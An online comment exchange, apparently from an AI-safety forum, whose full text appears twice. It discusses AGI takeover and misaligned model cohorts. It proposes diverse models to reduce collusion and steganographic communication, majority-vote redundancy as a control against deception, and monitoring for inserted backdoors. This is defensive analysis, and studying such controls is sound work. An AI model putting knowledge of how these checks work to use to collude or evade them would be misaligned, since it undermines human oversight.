I’d be significantly more optimistic if I thought that humans would have access to many AGIs, some unable to betray. (well more specifically: some genuinely always honest and helpful even about stuff like AGI takeover) Instead I think that the cohort of most-powerful-AGIs-in-the-world will at some point be entirely misaligned & adversarial. (After all, they’ll probably all be copies of the same AGI, or at least fine-tunes of the same base model)
Daniel you proposed in a dialogue a large number of ultrafast AGI that are serving as AI researchers.
If you think about it each underlying AI model you are trying to improve is a coordinate in the possibility space of all models, and you then have your researcher AGI attempt to find an improvement from that starting point.
This will get stuck at local minima. To improve your odds of finding the strongest model current compute is able to support, you would want to be doing this RSI search from a diverse league of many starting locations. I can draw you a plot if it helps.
The historical equivalent is how the Manhattan project invested and optimized 3 entire pipelines to obtain fissionables. (Calutron, gas centrifuge, breeder reactor). The reason was they didn’t know how far each pipeline would scale when optimized. It was possible that any effort could hit a wall. For AI we don’t know how far llms will scale, or variants that use an entirely different underlying network architecture, or sparse spiking networks, etc. It is possible that any popular method will saturate at greater scales.
One of the benefits to using AGI to advance AI is there are humans here who have invested their entire career into solely mastering transformers. When those become obsolete they will have difficulty shifting to the new best method, vs fine tuning on all information that exists on the new method in a week.
Completely diverse models that use a different underlying method are probably less able to collude with each other or communicate via stenography if they have no shared context.
You could use the resulting diverse AGI grade models as polyglot redundant system architecture. I have read of this but don’t believe humans have ever been able to afford to implement it. This is where you would write an avionics or other life safety application several times, on different software stacks (different OS, different language). They run in lockstep on separate hardware and the majority output goes to the control actuators.
For AI driven robotics this would probably be immune to most adversarial inputs among other advantages, and it makes deception and betrayal very difficult to happen at all. For some applications, paying for triple the hardware and triple the AI license fees might be worth the increased reliability. This is also a simple measure humans could take if it turns out that deceptive AI are an actual problem. I am sure you saw the paper where someone tried this with gpt-3.5 and 4 for a mock ‘insert a backdoor ’ task. Using Gemini is more diverse, and using some non LLM method to analyze code specifically for backdoors would likely be even better.
I’d be significantly more optimistic if I thought that humans would have access to many AGIs, some unable to betray. (well more specifically: some genuinely always honest and helpful even about stuff like AGI takeover) Instead I think that the cohort of most-powerful-AGIs-in-the-world will at some point be entirely misaligned & adversarial. (After all, they’ll probably all be copies of the same AGI, or at least fine-tunes of the same base model)
Daniel you proposed in a dialogue a large number of ultrafast AGI that are serving as AI researchers.
If you think about it each underlying AI model you are trying to improve is a coordinate in the possibility space of all models, and you then have your researcher AGI attempt to find an improvement from that starting point.
This will get stuck at local minima. To improve your odds of finding the strongest model current compute is able to support, you would want to be doing this RSI search from a diverse league of many starting locations. I can draw you a plot if it helps.
The historical equivalent is how the Manhattan project invested and optimized 3 entire pipelines to obtain fissionables. (Calutron, gas centrifuge, breeder reactor). The reason was they didn’t know how far each pipeline would scale when optimized. It was possible that any effort could hit a wall. For AI we don’t know how far llms will scale, or variants that use an entirely different underlying network architecture, or sparse spiking networks, etc. It is possible that any popular method will saturate at greater scales.
One of the benefits to using AGI to advance AI is there are humans here who have invested their entire career into solely mastering transformers. When those become obsolete they will have difficulty shifting to the new best method, vs fine tuning on all information that exists on the new method in a week.
Completely diverse models that use a different underlying method are probably less able to collude with each other or communicate via stenography if they have no shared context.
You could use the resulting diverse AGI grade models as polyglot redundant system architecture. I have read of this but don’t believe humans have ever been able to afford to implement it. This is where you would write an avionics or other life safety application several times, on different software stacks (different OS, different language). They run in lockstep on separate hardware and the majority output goes to the control actuators.
For AI driven robotics this would probably be immune to most adversarial inputs among other advantages, and it makes deception and betrayal very difficult to happen at all. For some applications, paying for triple the hardware and triple the AI license fees might be worth the increased reliability. This is also a simple measure humans could take if it turns out that deceptive AI are an actual problem. I am sure you saw the paper where someone tried this with gpt-3.5 and 4 for a mock ‘insert a backdoor ’ task. Using Gemini is more diverse, and using some non LLM method to analyze code specifically for backdoors would likely be even better.